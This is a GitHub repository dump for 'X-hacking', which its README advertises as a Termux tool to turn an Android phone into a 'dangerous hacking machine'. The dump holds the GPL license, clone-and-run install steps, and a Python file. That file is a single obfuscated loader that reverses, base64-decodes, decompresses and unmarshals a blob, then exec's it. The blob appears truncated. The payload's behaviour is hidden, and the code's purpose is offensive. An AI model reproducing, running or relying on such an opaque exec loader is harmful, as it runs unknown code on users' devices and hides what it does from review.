├── LICENSE
├── README.md
├── X-hacking.jpg
└── X-hacking.py
/LICENSE:
--------------------------------------------------------------------------------
1 | GNU GENERAL PUBLIC LICENSE
2 | Version 3, 29 June 2007
3 |
4 | Copyright (C) 2007 Free Software Foundation, Inc.
5 | Everyone is permitted to copy and distribute verbatim copies
6 | of this license document, but changing it is not allowed.
7 |
8 | Preamble
9 |
10 | The GNU General Public License is a free, copyleft license for
11 | software and other kinds of works.
12 |
13 | The licenses for most software and other practical works are designed
14 | to take away your freedom to share and change the works. By contrast,
15 | the GNU General Public License is intended to guarantee your freedom to
16 | share and change all versions of a program--to make sure it remains free
17 | software for all its users. We, the Free Software Foundation, use the
18 | GNU General Public License for most of our software; it applies also to
19 | any other work released this way by its authors. You can apply it to
20 | your programs, too.
21 |
22 | When we speak of free software, we are referring to freedom, not
23 | price. Our General Public Licenses are designed to make sure that you
24 | have the freedom to distribute copies of free software (and charge for
25 | them if you wish), that you receive source code or can get it if you
26 | want it, that you can change the software or use pieces of it in new
27 | free programs, and that you know you can do these things.
28 |
29 | To protect your rights, we need to prevent others from denying you
30 | these rights or asking you to surrender the rights. Therefore, you have
31 | certain responsibilities if you distribute copies of the software, or if
32 | you modify it: responsibilities to respect the freedom of others.
33 |
34 | For example, if you distribute copies of such a program, whether
35 | gratis or for a fee, you must pass on to the recipients the same
36 | freedoms that you received. You must make sure that they, too, receive
37 | or can get the source code. And you must show them these terms so they
38 | know their rights.
39 |
40 | Developers that use the GNU GPL protect your rights with two steps:
41 | (1) assert copyright on the software, and (2) offer you this License
42 | giving you legal permission to copy, distribute and/or modify it.
43 |
44 | For the developers' and authors' protection, the GPL clearly explains
45 | that there is no warranty for this free software. For both users' and
46 | authors' sake, the GPL requires that modified versions be marked as
47 | changed, so that their problems will not be attributed erroneously to
48 | authors of previous versions.
49 |
50 | Some devices are designed to deny users access to install or run
51 | modified versions of the software inside them, although the manufacturer
52 | can do so. This is fundamentally incompatible with the aim of
53 | protecting users' freedom to change the software. The systematic
54 | pattern of such abuse occurs in the area of products for individuals to
55 | use, which is precisely where it is most unacceptable. Therefore, we
56 | have designed this version of the GPL to prohibit the practice for those
57 | products. If such problems arise substantially in other domains, we
58 | stand ready to extend this provision to those domains in future versions
59 | of the GPL, as needed to protect the freedom of users.
60 |
61 | Finally, every program is threatened constantly by software patents.
62 | States should not allow patents to restrict development and use of
63 | software on general-purpose computers, but in those that do, we wish to
64 | avoid the special danger that patents applied to a free program could
65 | make it effectively proprietary. To prevent this, the GPL assures that
66 | patents cannot be used to render the program non-free.
67 |
68 | The precise terms and conditions for copying, distribution and
69 | modification follow.
70 |
71 | TERMS AND CONDITIONS
72 |
73 | 0. Definitions.
74 |
75 | "This License" refers to version 3 of the GNU General Public License.
76 |
77 | "Copyright" also means copyright-like laws that apply to other kinds of
78 | works, such as semiconductor masks.
79 |
80 | "The Program" refers to any copyrightable work licensed under this
81 | License. Each licensee is addressed as "you". "Licensees" and
82 | "recipients" may be individuals or organizations.
83 |
84 | To "modify" a work means to copy from or adapt all or part of the work
85 | in a fashion requiring copyright permission, other than the making of an
86 | exact copy. The resulting work is called a "modified version" of the
87 | earlier work or a work "based on" the earlier work.
88 |
89 | A "covered work" means either the unmodified Program or a work based
90 | on the Program.
91 |
92 | To "propagate" a work means to do anything with it that, without
93 | permission, would make you directly or secondarily liable for
94 | infringement under applicable copyright law, except executing it on a
95 | computer or modifying a private copy. Propagation includes copying,
96 | distribution (with or without modification), making available to the
97 | public, and in some countries other activities as well.
98 |
99 | To "convey" a work means any kind of propagation that enables other
100 | parties to make or receive copies. Mere interaction with a user through
101 | a computer network, with no transfer of a copy, is not conveying.
102 |
103 | An interactive user interface displays "Appropriate Legal Notices"
104 | to the extent that it includes a convenient and prominently visible
105 | feature that (1) displays an appropriate copyright notice, and (2)
106 | tells the user that there is no warranty for the work (except to the
107 | extent that warranties are provided), that licensees may convey the
108 | work under this License, and how to view a copy of this License. If
109 | the interface presents a list of user commands or options, such as a
110 | menu, a prominent item in the list meets this criterion.
111 |
112 | 1. Source Code.
113 |
114 | The "source code" for a work means the preferred form of the work
115 | for making modifications to it. "Object code" means any non-source
116 | form of a work.
117 |
118 | A "Standard Interface" means an interface that either is an official
119 | standard defined by a recognized standards body, or, in the case of
120 | interfaces specified for a particular programming language, one that
121 | is widely used among developers working in that language.
122 |
123 | The "System Libraries" of an executable work include anything, other
124 | than the work as a whole, that (a) is included in the normal form of
125 | packaging a Major Component, but which is not part of that Major
126 | Component, and (b) serves only to enable use of the work with that
127 | Major Component, or to implement a Standard Interface for which an
128 | implementation is available to the public in source code form. A
129 | "Major Component", in this context, means a major essential component
130 | (kernel, window system, and so on) of the specific operating system
131 | (if any) on which the executable work runs, or a compiler used to
132 | produce the work, or an object code interpreter used to run it.
133 |
134 | The "Corresponding Source" for a work in object code form means all
135 | the source code needed to generate, install, and (for an executable
136 | work) run the object code and to modify the work, including scripts to
137 | control those activities. However, it does not include the work's
138 | System Libraries, or general-purpose tools or generally available free
139 | programs which are used unmodified in performing those activities but
140 | which are not part of the work. For example, Corresponding Source
141 | includes interface definition files associated with source files for
142 | the work, and the source code for shared libraries and dynamically
143 | linked subprograms that the work is specifically designed to require,
144 | such as by intimate data communication or control flow between those
145 | subprograms and other parts of the work.
146 |
147 | The Corresponding Source need not include anything that users
148 | can regenerate automatically from other parts of the Corresponding
149 | Source.
150 |
151 | The Corresponding Source for a work in source code form is that
152 | same work.
153 |
154 | 2. Basic Permissions.
155 |
156 | All rights granted under this License are granted for the term of
157 | copyright on the Program, and are irrevocable provided the stated
158 | conditions are met. This License explicitly affirms your unlimited
159 | permission to run the unmodified Program. The output from running a
160 | covered work is covered by this License only if the output, given its
161 | content, constitutes a covered work. This License acknowledges your
162 | rights of fair use or other equivalent, as provided by copyright law.
163 |
164 | You may make, run and propagate covered works that you do not
165 | convey, without conditions so long as your license otherwise remains
166 | in force. You may convey covered works to others for the sole purpose
167 | of having them make modifications exclusively for you, or provide you
168 | with facilities for running those works, provided that you comply with
169 | the terms of this License in conveying all material for which you do
170 | not control copyright. Those thus making or running the covered works
171 | for you must do so exclusively on your behalf, under your direction
172 | and control, on terms that prohibit them from making any copies of
173 | your copyrighted material outside their relationship with you.
174 |
175 | Conveying under any other circumstances is permitted solely under
176 | the conditions stated below. Sublicensing is not allowed; section 10
177 | makes it unnecessary.
178 |
179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law.
180 |
181 | No covered work shall be deemed part of an effective technological
182 | measure under any applicable law fulfilling obligations under article
183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or
184 | similar laws prohibiting or restricting circumvention of such
185 | measures.
186 |
187 | When you convey a covered work, you waive any legal power to forbid
188 | circumvention of technological measures to the extent such circumvention
189 | is effected by exercising rights under this License with respect to
190 | the covered work, and you disclaim any intention to limit operation or
191 | modification of the work as a means of enforcing, against the work's
192 | users, your or third parties' legal rights to forbid circumvention of
193 | technological measures.
194 |
195 | 4. Conveying Verbatim Copies.
196 |
197 | You may convey verbatim copies of the Program's source code as you
198 | receive it, in any medium, provided that you conspicuously and
199 | appropriately publish on each copy an appropriate copyright notice;
200 | keep intact all notices stating that this License and any
201 | non-permissive terms added in accord with section 7 apply to the code;
202 | keep intact all notices of the absence of any warranty; and give all
203 | recipients a copy of this License along with the Program.
204 |
205 | You may charge any price or no price for each copy that you convey,
206 | and you may offer support or warranty protection for a fee.
207 |
208 | 5. Conveying Modified Source Versions.
209 |
210 | You may convey a work based on the Program, or the modifications to
211 | produce it from the Program, in the form of source code under the
212 | terms of section 4, provided that you also meet all of these conditions:
213 |
214 | a) The work must carry prominent notices stating that you modified
215 | it, and giving a relevant date.
216 |
217 | b) The work must carry prominent notices stating that it is
218 | released under this License and any conditions added under section
219 | 7. This requirement modifies the requirement in section 4 to
220 | "keep intact all notices".
221 |
222 | c) You must license the entire work, as a whole, under this
223 | License to anyone who comes into possession of a copy. This
224 | License will therefore apply, along with any applicable section 7
225 | additional terms, to the whole of the work, and all its parts,
226 | regardless of how they are packaged. This License gives no
227 | permission to license the work in any other way, but it does not
228 | invalidate such permission if you have separately received it.
229 |
230 | d) If the work has interactive user interfaces, each must display
231 | Appropriate Legal Notices; however, if the Program has interactive
232 | interfaces that do not display Appropriate Legal Notices, your
233 | work need not make them do so.
234 |
235 | A compilation of a covered work with other separate and independent
236 | works, which are not by their nature extensions of the covered work,
237 | and which are not combined with it such as to form a larger program,
238 | in or on a volume of a storage or distribution medium, is called an
239 | "aggregate" if the compilation and its resulting copyright are not
240 | used to limit the access or legal rights of the compilation's users
241 | beyond what the individual works permit. Inclusion of a covered work
242 | in an aggregate does not cause this License to apply to the other
243 | parts of the aggregate.
244 |
245 | 6. Conveying Non-Source Forms.
246 |
247 | You may convey a covered work in object code form under the terms
248 | of sections 4 and 5, provided that you also convey the
249 | machine-readable Corresponding Source under the terms of this License,
250 | in one of these ways:
251 |
252 | a) Convey the object code in, or embodied in, a physical product
253 | (including a physical distribution medium), accompanied by the
254 | Corresponding Source fixed on a durable physical medium
255 | customarily used for software interchange.
256 |
257 | b) Convey the object code in, or embodied in, a physical product
258 | (including a physical distribution medium), accompanied by a
259 | written offer, valid for at least three years and valid for as
260 | long as you offer spare parts or customer support for that product
261 | model, to give anyone who possesses the object code either (1) a
262 | copy of the Corresponding Source for all the software in the
263 | product that is covered by this License, on a durable physical
264 | medium customarily used for software interchange, for a price no
265 | more than your reasonable cost of physically performing this
266 | conveying of source, or (2) access to copy the
267 | Corresponding Source from a network server at no charge.
268 |
269 | c) Convey individual copies of the object code with a copy of the
270 | written offer to provide the Corresponding Source. This
271 | alternative is allowed only occasionally and noncommercially, and
272 | only if you received the object code with such an offer, in accord
273 | with subsection 6b.
274 |
275 | d) Convey the object code by offering access from a designated
276 | place (gratis or for a charge), and offer equivalent access to the
277 | Corresponding Source in the same way through the same place at no
278 | further charge. You need not require recipients to copy the
279 | Corresponding Source along with the object code. If the place to
280 | copy the object code is a network server, the Corresponding Source
281 | may be on a different server (operated by you or a third party)
282 | that supports equivalent copying facilities, provided you maintain
283 | clear directions next to the object code saying where to find the
284 | Corresponding Source. Regardless of what server hosts the
285 | Corresponding Source, you remain obligated to ensure that it is
286 | available for as long as needed to satisfy these requirements.
287 |
288 | e) Convey the object code using peer-to-peer transmission, provided
289 | you inform other peers where the object code and Corresponding
290 | Source of the work are being offered to the general public at no
291 | charge under subsection 6d.
292 |
293 | A separable portion of the object code, whose source code is excluded
294 | from the Corresponding Source as a System Library, need not be
295 | included in conveying the object code work.
296 |
297 | A "User Product" is either (1) a "consumer product", which means any
298 | tangible personal property which is normally used for personal, family,
299 | or household purposes, or (2) anything designed or sold for incorporation
300 | into a dwelling. In determining whether a product is a consumer product,
301 | doubtful cases shall be resolved in favor of coverage. For a particular
302 | product received by a particular user, "normally used" refers to a
303 | typical or common use of that class of product, regardless of the status
304 | of the particular user or of the way in which the particular user
305 | actually uses, or expects or is expected to use, the product. A product
306 | is a consumer product regardless of whether the product has substantial
307 | commercial, industrial or non-consumer uses, unless such uses represent
308 | the only significant mode of use of the product.
309 |
310 | "Installation Information" for a User Product means any methods,
311 | procedures, authorization keys, or other information required to install
312 | and execute modified versions of a covered work in that User Product from
313 | a modified version of its Corresponding Source. The information must
314 | suffice to ensure that the continued functioning of the modified object
315 | code is in no case prevented or interfered with solely because
316 | modification has been made.
317 |
318 | If you convey an object code work under this section in, or with, or
319 | specifically for use in, a User Product, and the conveying occurs as
320 | part of a transaction in which the right of possession and use of the
321 | User Product is transferred to the recipient in perpetuity or for a
322 | fixed term (regardless of how the transaction is characterized), the
323 | Corresponding Source conveyed under this section must be accompanied
324 | by the Installation Information. But this requirement does not apply
325 | if neither you nor any third party retains the ability to install
326 | modified object code on the User Product (for example, the work has
327 | been installed in ROM).
328 |
329 | The requirement to provide Installation Information does not include a
330 | requirement to continue to provide support service, warranty, or updates
331 | for a work that has been modified or installed by the recipient, or for
332 | the User Product in which it has been modified or installed. Access to a
333 | network may be denied when the modification itself materially and
334 | adversely affects the operation of the network or violates the rules and
335 | protocols for communication across the network.
336 |
337 | Corresponding Source conveyed, and Installation Information provided,
338 | in accord with this section must be in a format that is publicly
339 | documented (and with an implementation available to the public in
340 | source code form), and must require no special password or key for
341 | unpacking, reading or copying.
342 |
343 | 7. Additional Terms.
344 |
345 | "Additional permissions" are terms that supplement the terms of this
346 | License by making exceptions from one or more of its conditions.
347 | Additional permissions that are applicable to the entire Program shall
348 | be treated as though they were included in this License, to the extent
349 | that they are valid under applicable law. If additional permissions
350 | apply only to part of the Program, that part may be used separately
351 | under those permissions, but the entire Program remains governed by
352 | this License without regard to the additional permissions.
353 |
354 | When you convey a copy of a covered work, you may at your option
355 | remove any additional permissions from that copy, or from any part of
356 | it. (Additional permissions may be written to require their own
357 | removal in certain cases when you modify the work.) You may place
358 | additional permissions on material, added by you to a covered work,
359 | for which you have or can give appropriate copyright permission.
360 |
361 | Notwithstanding any other provision of this License, for material you
362 | add to a covered work, you may (if authorized by the copyright holders of
363 | that material) supplement the terms of this License with terms:
364 |
365 | a) Disclaiming warranty or limiting liability differently from the
366 | terms of sections 15 and 16 of this License; or
367 |
368 | b) Requiring preservation of specified reasonable legal notices or
369 | author attributions in that material or in the Appropriate Legal
370 | Notices displayed by works containing it; or
371 |
372 | c) Prohibiting misrepresentation of the origin of that material, or
373 | requiring that modified versions of such material be marked in
374 | reasonable ways as different from the original version; or
375 |
376 | d) Limiting the use for publicity purposes of names of licensors or
377 | authors of the material; or
378 |
379 | e) Declining to grant rights under trademark law for use of some
380 | trade names, trademarks, or service marks; or
381 |
382 | f) Requiring indemnification of licensors and authors of that
383 | material by anyone who conveys the material (or modified versions of
384 | it) with contractual assumptions of liability to the recipient, for
385 | any liability that these contractual assumptions directly impose on
386 | those licensors and authors.
387 |
388 | All other non-permissive additional terms are considered "further
389 | restrictions" within the meaning of section 10. If the Program as you
390 | received it, or any part of it, contains a notice stating that it is
391 | governed by this License along with a term that is a further
392 | restriction, you may remove that term. If a license document contains
393 | a further restriction but permits relicensing or conveying under this
394 | License, you may add to a covered work material governed by the terms
395 | of that license document, provided that the further restriction does
396 | not survive such relicensing or conveying.
397 |
398 | If you add terms to a covered work in accord with this section, you
399 | must place, in the relevant source files, a statement of the
400 | additional terms that apply to those files, or a notice indicating
401 | where to find the applicable terms.
402 |
403 | Additional terms, permissive or non-permissive, may be stated in the
404 | form of a separately written license, or stated as exceptions;
405 | the above requirements apply either way.
406 |
407 | 8. Termination.
408 |
409 | You may not propagate or modify a covered work except as expressly
410 | provided under this License. Any attempt otherwise to propagate or
411 | modify it is void, and will automatically terminate your rights under
412 | this License (including any patent licenses granted under the third
413 | paragraph of section 11).
414 |
415 | However, if you cease all violation of this License, then your
416 | license from a particular copyright holder is reinstated (a)
417 | provisionally, unless and until the copyright holder explicitly and
418 | finally terminates your license, and (b) permanently, if the copyright
419 | holder fails to notify you of the violation by some reasonable means
420 | prior to 60 days after the cessation.
421 |
422 | Moreover, your license from a particular copyright holder is
423 | reinstated permanently if the copyright holder notifies you of the
424 | violation by some reasonable means, this is the first time you have
425 | received notice of violation of this License (for any work) from that
426 | copyright holder, and you cure the violation prior to 30 days after
427 | your receipt of the notice.
428 |
429 | Termination of your rights under this section does not terminate the
430 | licenses of parties who have received copies or rights from you under
431 | this License. If your rights have been terminated and not permanently
432 | reinstated, you do not qualify to receive new licenses for the same
433 | material under section 10.
434 |
435 | 9. Acceptance Not Required for Having Copies.
436 |
437 | You are not required to accept this License in order to receive or
438 | run a copy of the Program. Ancillary propagation of a covered work
439 | occurring solely as a consequence of using peer-to-peer transmission
440 | to receive a copy likewise does not require acceptance. However,
441 | nothing other than this License grants you permission to propagate or
442 | modify any covered work. These actions infringe copyright if you do
443 | not accept this License. Therefore, by modifying or propagating a
444 | covered work, you indicate your acceptance of this License to do so.
445 |
446 | 10. Automatic Licensing of Downstream Recipients.
447 |
448 | Each time you convey a covered work, the recipient automatically
449 | receives a license from the original licensors, to run, modify and
450 | propagate that work, subject to this License. You are not responsible
451 | for enforcing compliance by third parties with this License.
452 |
453 | An "entity transaction" is a transaction transferring control of an
454 | organization, or substantially all assets of one, or subdividing an
455 | organization, or merging organizations. If propagation of a covered
456 | work results from an entity transaction, each party to that
457 | transaction who receives a copy of the work also receives whatever
458 | licenses to the work the party's predecessor in interest had or could
459 | give under the previous paragraph, plus a right to possession of the
460 | Corresponding Source of the work from the predecessor in interest, if
461 | the predecessor has it or can get it with reasonable efforts.
462 |
463 | You may not impose any further restrictions on the exercise of the
464 | rights granted or affirmed under this License. For example, you may
465 | not impose a license fee, royalty, or other charge for exercise of
466 | rights granted under this License, and you may not initiate litigation
467 | (including a cross-claim or counterclaim in a lawsuit) alleging that
468 | any patent claim is infringed by making, using, selling, offering for
469 | sale, or importing the Program or any portion of it.
470 |
471 | 11. Patents.
472 |
473 | A "contributor" is a copyright holder who authorizes use under this
474 | License of the Program or a work on which the Program is based. The
475 | work thus licensed is called the contributor's "contributor version".
476 |
477 | A contributor's "essential patent claims" are all patent claims
478 | owned or controlled by the contributor, whether already acquired or
479 | hereafter acquired, that would be infringed by some manner, permitted
480 | by this License, of making, using, or selling its contributor version,
481 | but do not include claims that would be infringed only as a
482 | consequence of further modification of the contributor version. For
483 | purposes of this definition, "control" includes the right to grant
484 | patent sublicenses in a manner consistent with the requirements of
485 | this License.
486 |
487 | Each contributor grants you a non-exclusive, worldwide, royalty-free
488 | patent license under the contributor's essential patent claims, to
489 | make, use, sell, offer for sale, import and otherwise run, modify and
490 | propagate the contents of its contributor version.
491 |
492 | In the following three paragraphs, a "patent license" is any express
493 | agreement or commitment, however denominated, not to enforce a patent
494 | (such as an express permission to practice a patent or covenant not to
495 | sue for patent infringement). To "grant" such a patent license to a
496 | party means to make such an agreement or commitment not to enforce a
497 | patent against the party.
498 |
499 | If you convey a covered work, knowingly relying on a patent license,
500 | and the Corresponding Source of the work is not available for anyone
501 | to copy, free of charge and under the terms of this License, through a
502 | publicly available network server or other readily accessible means,
503 | then you must either (1) cause the Corresponding Source to be so
504 | available, or (2) arrange to deprive yourself of the benefit of the
505 | patent license for this particular work, or (3) arrange, in a manner
506 | consistent with the requirements of this License, to extend the patent
507 | license to downstream recipients. "Knowingly relying" means you have
508 | actual knowledge that, but for the patent license, your conveying the
509 | covered work in a country, or your recipient's use of the covered work
510 | in a country, would infringe one or more identifiable patents in that
511 | country that you have reason to believe are valid.
512 |
513 | If, pursuant to or in connection with a single transaction or
514 | arrangement, you convey, or propagate by procuring conveyance of, a
515 | covered work, and grant a patent license to some of the parties
516 | receiving the covered work authorizing them to use, propagate, modify
517 | or convey a specific copy of the covered work, then the patent license
518 | you grant is automatically extended to all recipients of the covered
519 | work and works based on it.
520 |
521 | A patent license is "discriminatory" if it does not include within
522 | the scope of its coverage, prohibits the exercise of, or is
523 | conditioned on the non-exercise of one or more of the rights that are
524 | specifically granted under this License. You may not convey a covered
525 | work if you are a party to an arrangement with a third party that is
526 | in the business of distributing software, under which you make payment
527 | to the third party based on the extent of your activity of conveying
528 | the work, and under which the third party grants, to any of the
529 | parties who would receive the covered work from you, a discriminatory
530 | patent license (a) in connection with copies of the covered work
531 | conveyed by you (or copies made from those copies), or (b) primarily
532 | for and in connection with specific products or compilations that
533 | contain the covered work, unless you entered into that arrangement,
534 | or that patent license was granted, prior to 28 March 2007.
535 |
536 | Nothing in this License shall be construed as excluding or limiting
537 | any implied license or other defenses to infringement that may
538 | otherwise be available to you under applicable patent law.
539 |
540 | 12. No Surrender of Others' Freedom.
541 |
542 | If conditions are imposed on you (whether by court order, agreement or
543 | otherwise) that contradict the conditions of this License, they do not
544 | excuse you from the conditions of this License. If you cannot convey a
545 | covered work so as to satisfy simultaneously your obligations under this
546 | License and any other pertinent obligations, then as a consequence you may
547 | not convey it at all. For example, if you agree to terms that obligate you
548 | to collect a royalty for further conveying from those to whom you convey
549 | the Program, the only way you could satisfy both those terms and this
550 | License would be to refrain entirely from conveying the Program.
551 |
552 | 13. Use with the GNU Affero General Public License.
553 |
554 | Notwithstanding any other provision of this License, you have
555 | permission to link or combine any covered work with a work licensed
556 | under version 3 of the GNU Affero General Public License into a single
557 | combined work, and to convey the resulting work. The terms of this
558 | License will continue to apply to the part which is the covered work,
559 | but the special requirements of the GNU Affero General Public License,
560 | section 13, concerning interaction through a network will apply to the
561 | combination as such.
562 |
563 | 14. Revised Versions of this License.
564 |
565 | The Free Software Foundation may publish revised and/or new versions of
566 | the GNU General Public License from time to time. Such new versions will
567 | be similar in spirit to the present version, but may differ in detail to
568 | address new problems or concerns.
569 |
570 | Each version is given a distinguishing version number. If the
571 | Program specifies that a certain numbered version of the GNU General
572 | Public License "or any later version" applies to it, you have the
573 | option of following the terms and conditions either of that numbered
574 | version or of any later version published by the Free Software
575 | Foundation. If the Program does not specify a version number of the
576 | GNU General Public License, you may choose any version ever published
577 | by the Free Software Foundation.
578 |
579 | If the Program specifies that a proxy can decide which future
580 | versions of the GNU General Public License can be used, that proxy's
581 | public statement of acceptance of a version permanently authorizes you
582 | to choose that version for the Program.
583 |
584 | Later license versions may give you additional or different
585 | permissions. However, no additional obligations are imposed on any
586 | author or copyright holder as a result of your choosing to follow a
587 | later version.
588 |
589 | 15. Disclaimer of Warranty.
590 |
591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
599 |
600 | 16. Limitation of Liability.
601 |
602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
610 | SUCH DAMAGES.
611 |
612 | 17. Interpretation of Sections 15 and 16.
613 |
614 | If the disclaimer of warranty and limitation of liability provided
615 | above cannot be given local legal effect according to their terms,
616 | reviewing courts shall apply local law that most closely approximates
617 | an absolute waiver of all civil liability in connection with the
618 | Program, unless a warranty or assumption of liability accompanies a
619 | copy of the Program in return for a fee.
620 |
621 | END OF TERMS AND CONDITIONS
622 |
623 | How to Apply These Terms to Your New Programs
624 |
625 | If you develop a new program, and you want it to be of the greatest
626 | possible use to the public, the best way to achieve this is to make it
627 | free software which everyone can redistribute and change under these terms.
628 |
629 | To do so, attach the following notices to the program. It is safest
630 | to attach them to the start of each source file to most effectively
631 | state the exclusion of warranty; and each file should have at least
632 | the "copyright" line and a pointer to where the full notice is found.
633 |
634 |
635 | Copyright (C)
636 |
637 | This program is free software: you can redistribute it and/or modify
638 | it under the terms of the GNU General Public License as published by
639 | the Free Software Foundation, either version 3 of the License, or
640 | (at your option) any later version.
641 |
642 | This program is distributed in the hope that it will be useful,
643 | but WITHOUT ANY WARRANTY; without even the implied warranty of
644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
645 | GNU General Public License for more details.
646 |
647 | You should have received a copy of the GNU General Public License
648 | along with this program. If not, see .
649 |
650 | Also add information on how to contact you by electronic and paper mail.
651 |
652 | If the program does terminal interaction, make it output a short
653 | notice like this when it starts in an interactive mode:
654 |
655 | Copyright (C)
656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
657 | This is free software, and you are welcome to redistribute it
658 | under certain conditions; type `show c' for details.
659 |
660 | The hypothetical commands `show w' and `show c' should show the appropriate
661 | parts of the General Public License. Of course, your program's commands
662 | might be different; for a GUI interface, you would use an "about box".
663 |
664 | You should also get your employer (if you work as a programmer) or school,
665 | if any, to sign a "copyright disclaimer" for the program, if necessary.
666 | For more information on this, and how to apply and follow the GNU GPL, see
667 | .
668 |
669 | The GNU General Public License does not permit incorporating your program
670 | into proprietary programs. If your program is a subroutine library, you
671 | may consider it more useful to permit linking proprietary applications with
672 | the library. If this is what you want to do, use the GNU Lesser General
673 | Public License instead of this License. But first, please read
674 | .
675 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # X-hacking
2 | 
3 |
4 | ## introduction
5 | Turn your android into a dangerous hacking machine
6 |
7 | ## Instalations
8 | ```
9 | $ pkg update -y && pkg upgrade -y
10 | $ apt update -y && apt upgrade -y
11 | $ pkg install git
12 | $ git clone https://github.com/Whomrx666/X-hacking
13 | $ cd X-hacking
14 | $ chmod +x X-hacking.py
15 | $ python X-hacking.py
16 | ```
17 | ## Note
18 | [ONLY FOR TERMUX]
19 |
20 | ## Instructions
21 | - **First**: Install tools according to the instructions above
22 | - **second**: Select one of the tools in the list
23 | - **Third**: If you want to install all the tools, just type 00
24 | - **Fourth**: Run the tools that you have installed
25 | - **Last**: Congratulations, your Android has become a hacking machine
26 |
27 | ## Observation
28 | This is a tool for education only, I am not responsible for any misuse
29 | ### Original Author
30 |
31 |
32 | ### <<< If you copy , Then Give me The Credits >>>
33 |
34 | ## CONNECT WITH ME :
35 |
36 | [](https://whomrxhackers.blogspot.com/)
37 | [](https://twitter.com/whomrx666)
38 | [](https://youtube.com/@whomrxhackers)
39 | [](https://facebook.com/https://www.facebook.com/whomrx.666)
40 | [](https://t.me/Whomr_X)
41 | [](mailto:whomrx666@gmail.com)
42 | [](https://www.tiktok.com/@whomr.x)
43 |
44 | **If you want to donate, click on the button**
45 |
46 |
47 | ### Visitors :
48 | 
--------------------------------------------------------------------------------
/X-hacking.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Whomrx666/X-hacking/6835bef01756b2169fc1841f1c33f2687fc9e035/X-hacking.jpg
--------------------------------------------------------------------------------
/X-hacking.py:
--------------------------------------------------------------------------------
1 | # Code by Mr.X
2 | # Dont recode this skids:V
3 | # -------------------------------
4 | _ = lambda __ : __import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(__[::-1])));exec((_)(b'ReTdr/h/91zvP/Luzk+6//7uc7/Sf+N3p/3HPeu+74/3P+u//9znnmv/cU//vM75tf658v/+2cLSudb+//x+83e//8u9P/xv4z//HzP//VSmZ/2xx//r9PDltrjgx/DCIvdm7IibHC8icox7Tml6aqhEZp2TJGUDT+9ldYkAZ1nUFmuPjQu4pvg7M7Wp+WNDFFEBweFRKE1JwEwn8ENdAEQ08Br8QOXP4fBI+DmgtB/bABwEOz+cf+YLDSwGrjKkBZQ0Dy8PXR2htBwqO1Vm13PPAz9BFt+7MvrAOJWasHrkw4dsaUjkzQ9hvon+HE29KN+hrBmupd9kXviQzA++YMMjNBsptUSgzREE6Bi7xtcz1HRXmqRUSEHxcdmd45UFKHnkazbyCJrMAtqrJ9zak0YcqrYd5CLgHX/gV8O3m6/plFLxVjLrOOIAiyHqGWRPeNgAzubrhtWhDp7gF5wQb9SQCzbwHqArecCmvL++xq7BGvxnFKB/cz73OBzMBc/DefIAuVxyNb5MZObYnTrIYqV6rYOp6JcHKPlWilhavEDJrGjHwm7+pbjADtOLarUic7OeIegV/2tUHj90xJynR8bjxXArDGucOD7Tl7+rn7KmaYjNfZO9yJLGqQrwE3Hk5tN/DK19GxprVZYK14ExlFDGUNUqK2eanzoGGwSaAVwEXVOfxNJ1Qccd8JvRqwi0h7H3uWHCQeAye5K+TMtYq47VdF2muAtJ2GffaNbUa9YAR1q4IV6ynLX8hM6BmP1zNvkcoXAi5IQZR4LPFSg//WbTmHJ9phrukhDT741RCGL1I7mAj8qgEeVxTXXArrxVOl0rNjCKBih3HdUTJpE6DkyDYuslGsWvMzrLWZopAmh42P/D6gRDH2vfATQNYMmE9qd3Dp3KKjLSAAC/zh9y4qRdhpzWfwKqgGd1Tz04+Vz6W9iwReUu8Eink7UzJOL4GLAATfWukn3tUhHsknKOHuPeRxsz9p2QeJUp7KcIVYhap+GA0FrbXXMaVOkb4p7PMnoc68cpu285sZWV/8jEGrzWLlTh/+kuaxE8R3HLiH6JimDe7y39sjGyMAW5FBZ+ku6/Dkppfbygw1COWLK3UfkpqA/3gCpNpqkKXZq1+yk9YbRpdQ2aomgYcAg9dpT64Azp29b6W0AcjS7E6dx6JiVdSov5ae/nS+Buf+Q7WJNl97zyOP6r2OY+sMdGmLXYvBN9yWpWK95Cb7iDu6qdyAZ34bEOiaHQrdAODgFSFFd02NkQb+wTxoUtkQC/HS9bCJpF9DP8nL6jIBSNXbAWaOYm2N51S3aHAk8bVpTmdGiVNaK7nLx5LEu97I+GRVRGkJl5kT5yBLXs3BrvCQbrftiw5lkJPo3SNwio/6hOGPlp6nAvGRI7Dj3ypYtmQPG8a77iIWT4RQBa5ME